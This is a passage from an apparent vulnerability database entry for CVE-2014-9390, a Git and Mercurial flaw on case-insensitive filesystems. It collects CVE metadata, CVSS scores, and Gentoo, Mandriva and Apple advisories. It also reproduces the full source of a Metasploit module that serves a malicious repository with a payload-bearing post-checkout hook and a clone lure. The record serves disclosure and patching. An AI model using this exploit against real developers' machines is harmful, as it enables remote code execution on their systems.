"MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "en", value: "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "en", value: "CWE-20", }, ], }, ], }, references: { reference_data: [ { name: "https://news.ycombinator.com/item?id=8769667", refsource: "MISC", tags: [ "Issue Tracking", "Patch", "Third Party Advisory", ], url: "https://news.ycombinator.com/item?id=8769667", }, { name: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", refsource: "MISC", tags: [ "Third Party Advisory", ], url: "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html", }, { name: "https://github.com/blog/1938-git-client-vulnerability-announced", refsource: "MISC", tags: [ "Vendor Advisory", ], url: "https://github.com/blog/1938-git-client-vulnerability-announced", }, { name: "http://securitytracker.com/id?1031404", refsource: "MISC", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://securitytracker.com/id?1031404", }, { name: "http://article.gmane.org/gmane.linux.kernel/1853266", refsource: "MISC", tags: [ "Broken Link", ], url: "http://article.gmane.org/gmane.linux.kernel/1853266", }, { name: "http://mercurial.selenic.com/wiki/WhatsNew", refsource: "MISC", tags: [ "Release Notes", "Third Party Advisory", ], url: "http://mercurial.selenic.com/wiki/WhatsNew", }, { name: "http://support.apple.com/kb/HT204147", refsource: "MISC", tags: [ "Vendor Advisory", ], url: "http://support.apple.com/kb/HT204147", }, { name: "https://libgit2.org/security/", refsource: "MISC", tags: [ "Product", ], url: "https://libgit2.org/security/", }, { name: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", refsource: "MISC", tags: [ "Third Party Advisory", ], url: "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915", }, ], }, }, impact: { baseMetricV2: { acInsufInfo: false, cvssV2: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 6.4, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, severity: "HIGH", userInteractionRequired: false, }, baseMetricV3: { cvssV3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 5.9, }, }, lastModifiedDate: "2021-05-17T19:54Z", publishedDate: "2020-02-12T02:15Z", }, }, }
var-202002-0749
Vulnerability from variot
Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine all versions before 08-12-2014; libgit2 all versions up to 0.21.2; Egit all versions before 08-12-2014; and JGit all versions before 08-12-2014 allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem. Remote for multiple products Git The server is vulnerable to the execution of arbitrary commands. ..(1) Negligible Unicode Code point, (2) git~1/config Expression, or (3) Cleverly crafted with mixed cases that are improperly processed on case-insensitive filesystems .git/config Arbitrary commands can be executed through the tree containing the files. Git is prone to a vulnerability that may allow attackers to overwrite arbitrary local files. Successful exploits may allow an attacker to write arbitrary files in the context of the user running the affected application. libgit2 and so on are all products. libgit2 is a portable Git core development package implemented in C language. Apple Xcode, etc. are all products of Apple (Apple). Apple Xcode is an integrated development environment provided to developers, Matt Mackall Mercurial, etc. are all products of Matt Mackall (Matt Mackall) software developers. An input validation error vulnerability exists in several products. The vulnerability stems from the failure of the network system or product to properly validate the input data.
Background
Git is a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency. ##
This module requires Metasploit: http://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Powershell
def initialize(info = {}) super(update_info( info, 'Name' => 'Malicious Git and Mercurial HTTP Server For CVE-2014-9390', 'Description' => %q( This module exploits CVE-2014-9390, which affects Git (versions less than 1.8.5.6, 1.9.5, 2.0.5, 2.1.4 and 2.2.1) and Mercurial (versions less than 3.2.3) and describes three vulnerabilities.
On operating systems which have case-insensitive file systems, like
Windows and OS X, Git clients can be convinced to retrieve and
overwrite sensitive configuration files in the .git
directory which can allow arbitrary code execution if a vulnerable
client can be convinced to perform certain actions (for example,
a checkout) against a malicious Git repository.
The third vulnerability with similar characteristics only affects
Mercurial clients on Windows, where Windows "short names"
(MS-DOS-compatible 8.3 format) are supported.
Today this module only truly supports the first vulnerability (Git
clients on case-insensitive file systems) but has the functionality to
support the remaining two with a little work.
),
'License' => MSF_LICENSE,
'Author' => [
'Jon Hart <jon_hart[at]rapid7.com>' # metasploit module
],
'References' =>
[
['CVE', '2014-9390'],
['URL', 'https://community.rapid7.com/community/metasploit/blog/2015/01/01/12-days-of-haxmas-exploiting-cve-2014-9390-in-git-and-mercurial'],
['URL', 'http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-214-and-221-and.html'],
['URL', 'http://article.gmane.org/gmane.linux.kernel/1853266'],
['URL', 'https://github.com/blog/1938-vulnerability-announced-update-your-git-clients'],
['URL', 'https://www.mehmetince.net/one-git-command-may-cause-you-hacked-cve-2014-9390-exploitation-for-shell/'],
['URL', 'http://mercurial.selenic.com/wiki/WhatsNew#Mercurial_3.2.3_.282014-12-18.29'],
['URL', 'http://selenic.com/repo/hg-stable/rev/c02a05cc6f5e'],
['URL', 'http://selenic.com/repo/hg-stable/rev/6dad422ecc5a']
],
'DisclosureDate' => 'Dec 18 2014',
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic bash-tcp perl bash'
}
}
}
],
[
'Windows Powershell',
{
'Platform' => [ 'windows' ],
'Arch' => [ARCH_X86, ARCH_X86_64]
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('GIT', [true, 'Exploit Git clients', true])
]
)
register_advanced_options(
[
OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
OptString.new('MERCURIAL_URI', [false, 'The URI to use as the malicious Mercurial instance (empty for random)', '']),
OptString.new('GIT_HOOK', [false, 'The Git hook to use for exploitation', 'post-checkout']),
OptString.new('MERCURIAL_HOOK', [false, 'The Mercurial hook to use for exploitation', 'update']),
OptBool.new('MERCURIAL', [false, 'Enable experimental Mercurial support', false])
]
)
end
def setup # the exploit requires that we act enough like a real Mercurial HTTP instance, # so we keep a mapping of all of the files and the corresponding data we'll # send back along with a trigger file that signifies that the git/mercurial # client has fetched the malicious content. @repo_data = { git: { files: {}, trigger: nil }, mercurial: { files: {}, trigger: nil } }
unless datastore['GIT'] || datastore['MERCURIAL']
fail_with(Exploit::Failure::BadConfig, 'Must specify at least one GIT and/or MERCURIAL')
end
setup_git
setup_mercurial
super
end
def setup_git return unless datastore['GIT'] # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'GIT_URI must start with a /') end # sanity check the malicious hook: if datastore['GIT_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'GIT_HOOK must not be blank') end
# In .git/hooks/ directory, specially named files are shell scripts that
# are executed when particular events occur. For example, if
# .git/hooks/post-checkout was an executable shell script, a git client
# would execute that file every time anything is checked out. There are
# various other files that can be used to achieve similar goals but related
# to committing, updating, etc.
#
# This builds a fake git repository using the knowledge from:
#
# http://schacon.github.io/gitbook/7_how_git_stores_objects.html
# http://schacon.github.io/gitbook/7_browsing_git_objects.html
case target.name
when 'Automatic'
full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
when 'Windows Powershell'
psh = cmd_psh_payload(payload.encoded,
payload_instance.arch.first,
remove_comspec: true,
encode_final_payload: true)
full_cmd = "#!/bin/sh\n#{psh}"
end
sha1, content = build_object('blob', full_cmd)
trigger = "/objects/#{get_path(sha1)}"
@repo_data[:git][:trigger] = trigger
@repo_data[:git][:files][trigger] = content
# build tree that points to the blob
sha1, content = build_object('tree', "100755 #{datastore['GIT_HOOK']}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the hooks directory in which the hook lives, called hooks
sha1, content = build_object('tree', "40000 hooks\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build a tree that points to the partially uppercased .git directory in
# which hooks live
variants = []
%w(g G). each do |g|
%w(i I).each do |i|
%w(t T).each do |t|
git = g + i + t
variants << git unless git.chars.none? { |c| c == c.upcase }
end
end
end
git_dir = '.' + variants.sample
sha1, content = build_object('tree', "40000 #{git_dir}\0#{[sha1].pack('H*')}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build the supposed commit that dropped this file, which has a random user/company
email = Rex::Text.rand_mail_address
first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
full_name = "#{first.capitalize} #{last.capitalize}"
tstamp = Time.now.to_i
author_time = rand(tstamp)
commit_time = rand(author_time)
tz_off = rand(10)
commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
"committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
"\n" \
"Initial commit to open git repository for #{company}!\n"
if datastore['VERBOSE']
vprint_status("Malicious Git commit of #{git_dir}/#{datastore['GIT_HOOK']} is:")
commit.each_line { |l| vprint_status(l.strip) }
end
sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
@repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
# build HEAD
@repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
# lastly, build refs
@repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
end
def setup_mercurial return unless datastore['MERCURIAL'] # URI must start with a / unless mercurial_uri && mercurial_uri =~ /^\// fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_URI must start with a /') end # sanity check the malicious hook if datastore['MERCURIAL_HOOK'].blank? fail_with(Exploit::Failure::BadConfig, 'MERCURIAL_HOOK must not be blank') end # we fake the Mercurial HTTP protocol such that we are compliant as possible but # also as simple as possible so that we don't have to support all of the protocol # complexities. Taken from: # http://mercurial.selenic.com/wiki/HttpCommandProtocol # http://selenic.com/hg/file/tip/mercurial/wireproto.py @repo_data[:mercurial][:files]['?cmd=capabilities'] = 'heads getbundle=HG10UN' fake_sha1 = 'e6c39c507d7079cfff4963a01ea3a195b855d814' @repo_data[:mercurial][:files]['?cmd=heads'] = "#{fake_sha1}\n" # TODO: properly bundle this using the information in http://mercurial.selenic.com/wiki/BundleFormat @repo_data[:mercurial][:files]["?cmd=getbundle&common=#{'0' * 40}&heads=#{fake_sha1}"] = Zlib::Deflate.deflate("HG10UNfoofoofoo")
# TODO: finish building the fake repository
end
# Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end
# Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end
def exploit super end
def primer # add the git and mercurial URIs as necessary if datastore['GIT'] hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end if datastore['MERCURIAL'] hardcoded_uripath(mercurial_uri) print_status("Malicious Mercurial URI is #{URI.parse(get_uri).merge(mercurial_uri)}") end end
# handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version if (user_agent = req.headers['User-Agent']) if datastore['GIT'] && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return elsif datastore['MERCURIAL'] && user_agent =~ /^mercurial\// && req.uri.start_with?(mercurial_uri) do_mercurial(cli, req) return end end
do_html(cli, req)
end
# simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) if req_file == @repo_data[:git][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end
# simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML Public Repositories
Here are our public repositories:
-
HTML
if datastore['GIT']
this_git_uri = URI.parse(get_uri).merge(git_uri)
resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
else
resp.body << "<li><a>Git</a> (currently offline)</li>"
end
if datastore['MERCURIAL']
this_mercurial_uri = URI.parse(get_uri).merge(mercurial_uri)
resp.body << "<li><a href=#{mercurial_uri}>Mercurial</a> (clone with `hg clone #{this_mercurial_uri}`)</li>"
else
resp.body << "<li><a>Mercurial</a> (currently offline)</li>"
end
resp.body << <<HTML
</ul>
</body>
</html>
HTML
cli.send_response(resp)
end
# simulates a Mercurial HTTP server def do_mercurial(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so uri = URI.parse(req.uri) req_path = uri.path req_path += "?#{uri.query}" if uri.query req_path.gsub!(/^#{mercurial_uri}/, '') if @repo_data[:mercurial][:files].key?(req_path) vprint_status("Sending Mercurial #{req_path}") send_response(cli, @repo_data[:mercurial][:files][req_path], 'Content-Type' => 'application/mercurial-0.1') if req_path == @repo_data[:mercurial][:trigger] vprint_status("Trigger!") # Do we need this? If so, how can I update the payload which is in a file which # has already been built? # regenerate_payload handler(cli) end else vprint_status("Mercurial #{req_path} doesn't exist") send_not_found(cli) end end
# Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end
# Returns the value of MERCURIAL_URI if not blank, otherwise returns a random URI def mercurial_uri return @mercurial_uri if @mercurial_uri if datastore['MERCURIAL_URI'].blank? @mercurial_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 6).downcase else @mercurial_uri = datastore['MERCURIAL_URI'] end end end .
Gentoo Linux Security Advisory GLSA 201612-19
https://security.gentoo.org/
Severity: Normal Title: Mercurial: Multiple vulnerabilities Date: December 07, 2016 Bugs: #533008, #544332, #578546, #582238 ID: 201612-19
Synopsis
Multiple vulnerabilities have been found in Mercurial, the worst of which could lead to the remote execution of arbitrary code.
Background
Mercurial is a distributed source control management system.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-vcs/mercurial < 3.8.4 >= 3.8.4
Description
Multiple vulnerabilities have been discovered in Mercurial. Please review the CVE identifier and bug reports referenced for details.
Impact
A remote attacker could possibly execute arbitrary code with the privileges of the process.
Workaround
There is no known workaround at this time.
Resolution
All mercurial users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-vcs/mercurial-3.8.4"
References
[ 1 ] CVE-2014-9390 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9390 [ 2 ] CVE-2014-9462 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9462 [ 3 ] CVE-2016-3068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3068 [ 4 ] CVE-2016-3069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3069 [ 5 ] CVE-2016-3105 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3105 [ 6 ] CVE-2016-3630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-3630
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201612-19
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:169 http://www.mandriva.com/en/support/security/
Package : git Date : March 30, 2015 Affected: Business Server 2.0
Problem Description:
Updated git packages fix security vulnerability:
It was reported that git, when used as a client on a case-insensitive filesystem, could allow the overwrite of the .git/config file when the client performed a git pull. Because git permitted committing .Git/config (or any case variation), on the pull this would replace the user's .git/config.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9390 http://advisories.mageia.org/MGASA-2014-0546.html
Updated Packages:
Mandriva Business Server 2/X86_64: ef3f480ca48a2a9611bd11fa8a045892 mbs2/x86_64/git-1.8.5.6-1.mbs2.x86_64.rpm efd3deae08fd17b80008bd3dc881d1f7 mbs2/x86_64/git-arch-1.8.5.6-1.mbs2.x86_64.rpm c60432719a43e70eb929c1c75c93fdda mbs2/x86_64/git-core-1.8.5.6-1.mbs2.x86_64.rpm 10fb62c0748447bd1b960789125e8d1b mbs2/x86_64/git-core-oldies-1.8.5.6-1.mbs2.x86_64.rpm dafec670f61de3e9942a97377b604859 mbs2/x86_64/git-cvs-1.8.5.6-1.mbs2.x86_64.rpm 879edb749813e5e175e90c88d2188eb9 mbs2/x86_64/git-email-1.8.5.6-1.mbs2.x86_64.rpm 1261450cb657453cd10a055301e42e01 mbs2/x86_64/gitk-1.8.5.6-1.mbs2.x86_64.rpm 8b4e493293c55a955e439233ae55ec99 mbs2/x86_64/git-prompt-1.8.5.6-1.mbs2.x86_64.rpm 2a4694ce47fe835f532cd7acc734e7b3 mbs2/x86_64/git-svn-1.8.5.6-1.mbs2.x86_64.rpm 39c2ff102bf754a4ca9a6d9d70fbc79c mbs2/x86_64/gitview-1.8.5.6-1.mbs2.x86_64.rpm 35bb63e42cfe602a24ae790fe3ddbd54 mbs2/x86_64/gitweb-1.8.5.6-1.mbs2.x86_64.rpm d464e9766d38928a7fe9510382356724 mbs2/x86_64/lib64git-devel-1.8.5.6-1.mbs2.x86_64.rpm 644c0f388c821f9192485494ac3199d5 mbs2/x86_64/perl-Git-1.8.5.6-1.mbs2.x86_64.rpm 261134d774a1b833817d8855214a9412 mbs2/SRPMS/git-1.8.5.6-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVGPUcmqjQ0CJFipgRAh4wAKDuznNiViTa2PaV8idvg0tSlPIzMACg7AqX AknCsk/2slzIzxNpACLxeDI= =Vdej -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
APPLE-SA-2015-03-09-4 Xcode 6.2
Xcode 6.2 is now available and addresses the following:
subversion Available for: OS X Mavericks v10.9.4 or later Impact: Multiple vulnerabilities in Apache Subversion Description: Multiple vulnerabilities existed in Apache Subversion, the most serious of which may have allowed an attacker with a privileged position to spoof SSL servers via a crafted certificate. These issues were addressed by updating Apache Subversion to version 1.7.19. This issue was addressed by adding additional checks. CVE-ID CVE-2014-9390 : Matt Mackall of Mercurial and Augie Fackler of Mercurial
Xcode 6.2 may be obtained from: https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
- Select Xcode in the menu bar
- Select About Xcode
- The version after applying this update will be "6.2"
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202002-0749", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "xcode", scope: "eq", trust: 1, vendor: "apple", version: "6.2", }, { model: "jgit", scope: "lt", trust: 1, vendor: "eclipse", version: "3.4.2", }, { model: "libgit2", scope: "lt", trust: 1, vendor: "libgit2", version: "0.21.3", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "1.9.0", }, { model: "xcode", scope: "lte", trust: 1, vendor: "apple", version: "6.1.1", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.2.1", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.2.0", }, { model: "egit", scope: "lt", trust: 1, vendor: "eclipse", version: "08-12-2014", }, { model: "jgit", scope: "lt", trust: 1, vendor: "eclipse", version: "3.5.3", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.1.4", }, { model: "mercurial", scope: "lt", trust: 1, vendor: "mercurial", version: "3.2.3", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "2.0.5", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "1.9.5", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.1.0", }, { model: "jgit", scope: "gte", trust: 1, vendor: "eclipse", version: "3.5.0", }, { model: "git", scope: "gte", trust: 1, vendor: "git scm", version: "2.0.0", }, { model: "git", scope: "lt", trust: 1, vendor: "git scm", version: "1.8.5.6", }, { model: "egit", scope: null, trust: 0.8, vendor: "eclipse", version: null, }, { model: "jgit", scope: null, trust: 0.8, vendor: "eclipse", version: null, }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "1.8.5.6", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "1.9.5", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.0.5", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.1.4", }, { model: "git", scope: "eq", trust: 0.8, vendor: "git scm", version: "2.2.1", }, { model: "libgit2", scope: null, trust: 0.8, vendor: "libgit2", version: null, }, { model: "mercurial", scope: "eq", trust: 0.8, vendor: "mercurial", version: "3.2.3", }, { model: "xcode", scope: "eq", trust: 0.8, vendor: "apple", version: "6.2 beta 3", }, { model: "linux lts i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux lts amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux", scope: null, trust: 0.3, vendor: "gentoo", version: null, }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.4.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "3.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "3.0", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.3", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.2", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.1", }, { model: "xcode", scope: "eq", trust: 0.3, vendor: "apple", version: "2.0", }, ], sources: [ { db: "BID", id: "71732", }, { db: "JVNDB", id: "JVNDB-2014-008933", }, { db: "NVD", id: "CVE-2014-9390", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/a:eclipse:egit", vulnerable: true, }, { cpe22Uri: "cpe:/a:eclipse:jgit", vulnerable: true, }, { cpe22Uri: "cpe:/a:git-scm:git", vulnerable: true, }, { cpe22Uri: "cpe:/a:libgit2_project:libgit2", vulnerable: true, }, { cpe22Uri: "cpe:/a:mercurial:mercurial", vulnerable: true, }, { cpe22Uri: "cpe:/a:apple:xcode", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2014-008933", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Matt Mackall and Augie Fackler", sources: [ { db: "BID", id: "71732", }, { db: "CNNVD", id: "CNNVD-201412-509", }, ], trust: 0.9, }, cve: "CVE-2014-9390", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "CVE-2014-9390", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 1.1, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { acInsufInfo: null, accessComplexity: "Low", accessVector: "Network", authentication: "None", author: "NVD", availabilityImpact: "Partial", baseScore: 7.5, confidentialityImpact: "Partial", exploitabilityScore: null, id: "JVNDB-2014-008933", impactScore: null, integrityImpact: "Partial", obtainAllPrivilege: null, obtainOtherPrivilege: null, obtainUserPrivilege: null, severity: "High", trust: 0.8, userInteractionRequired: null, vectorString: "AV:N/AC:L/Au:N/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 7.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 10, id: "VHN-77335", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "HIGH", trust: 0.1, vectorString: "AV:N/AC:L/AU:N/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "HIGH", baseScore: 9.8, baseSeverity: "CRITICAL", confidentialityImpact: "HIGH", exploitabilityScore: 3.9, id: "CVE-2014-9390", impactScore: 5.9, integrityImpact: "HIGH", privilegesRequired: "NONE", scope: "UNCHANGED", trust: 1, userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", version: "3.1", }, { attackComplexity: "Low", attackVector: "Network", author: "NVD", availabilityImpact: "High", baseScore: 9.8, baseSeverity: "Critical", confidentialityImpact: "High", exploitabilityScore: null, id: "JVNDB-2014-008933", 